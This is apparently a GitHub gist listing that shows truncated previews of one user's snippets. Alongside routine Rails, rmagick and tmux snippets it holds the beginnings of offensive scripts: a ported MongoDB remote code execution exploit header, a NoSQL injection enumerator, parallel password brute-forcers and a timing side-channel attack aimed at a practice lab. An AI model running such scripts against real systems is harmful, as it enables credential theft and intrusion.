Skip to content

Instantly share code, notes, and snippets.

View ugnius-s's full-sized avatar

Ugnius Skučas ugnius-s

3 followers · 1 following
View GitHub Profile
@ugnius-s
ugnius-s / foreign_key_levels.rb
Created August 20, 2021 13:05
# Rails foreign key levels
table_names = (ActiveRecord::Base.connection.tables - %w[ar_internal_metadata schema_migrations])
$levels = table_names.map do |table_name|
[table_name, 0]
end.to_h
$dependencies = table_names.map do |table_name|
[table_name, []]
end.to_h
@ugnius-s
ugnius-s / Install rmagick
Last active October 15, 2020 08:49
yay libmagick6
C_INCLUDE_PATH=/usr/include/ImageMagick-6/ PKG_CONFIG_PATH=/usr/lib/imagemagick6/pkgconfig gem install rmagick -v '2.16.0'
@ugnius-s
ugnius-s / 24947.rb
Last active September 21, 2019 11:47
# Title: MongoDB nativeHelper.apply Remote Code Execution
# Exploit Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/
# Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz
# MongoDB Version: 2.2.3
# Copied from https://www.exploit-db.com/exploits/24947
# Author: Ugnius Skučas
require 'http'
# MODIFY THESE
@ugnius-s
ugnius-s / nosqli.rb
Created September 19, 2019 23:06
require 'http'
require 'timeout'
require 'parallel'
MAX_COLLECTIONS_LENGTH = 100
MAX_COLLECTION_NAME_LENGTH = 100
alpha = ('a'..'z').to_a
numeric = ('0'..'9').to_a
special = [".", "_"]
@ugnius-s
ugnius-s / .tmux.conf
Created September 14, 2019 21:46
set -g base-index 1
# Automatically set window title
set-window-option -g automatic-rename on
set-option -g set-titles on
#set -g default-terminal screen-256color
set -g status-keys vi
set -g history-limit 10000
@ugnius-s
ugnius-s / bruteforce-post.rb
Created September 4, 2019 23:47
require 'http'
require 'parallel'
uri = "https://authlab.digi.ninja/Leaky_JWT_Login"
userlist = File.readlines('users.db').map(&:strip)
passlist = File.readlines('/usr/share/seclists/Passwords/darkweb2017-top1000.txt').map(&:strip)
Parallel.each(userlist, in_threads: 10) do |user|
Parallel.each_with_index(passlist, in_threads: 10) do |pass, index|
response = HTTP.post(uri, form: { username: user, password: pass })
@ugnius-s
ugnius-s / bruteforce-post.rb
Created September 4, 2019 23:22
require 'http'
require 'parallel'
uri = "https://authlab.digi.ninja/Leaky_JWT_Login"
userlist = File.readlines('users.db').map(&:strip)
passlist = File.readlines('/usr/share/seclists/Passwords/darkweb2017-top1000.txt').map(&:strip)
Parallel.each(userlist, in_processes: 5) do |user|
Parallel.each(passlist, in_processes: 20) do |pass|
response = HTTP.post(uri, form: { username: user, password: pass })
@ugnius-s
ugnius-s / time-side-channel.rb
Created September 2, 2019 23:40
require 'http'
require 'timeout'
require 'parallel'
uri = "https://authlab.digi.ninja/Timing_Login"
wordlist = File.readlines('wordlist.txt')
Parallel.each(wordlist, in_processes: 10) do |word|
begin
Timeout.timeout(1) do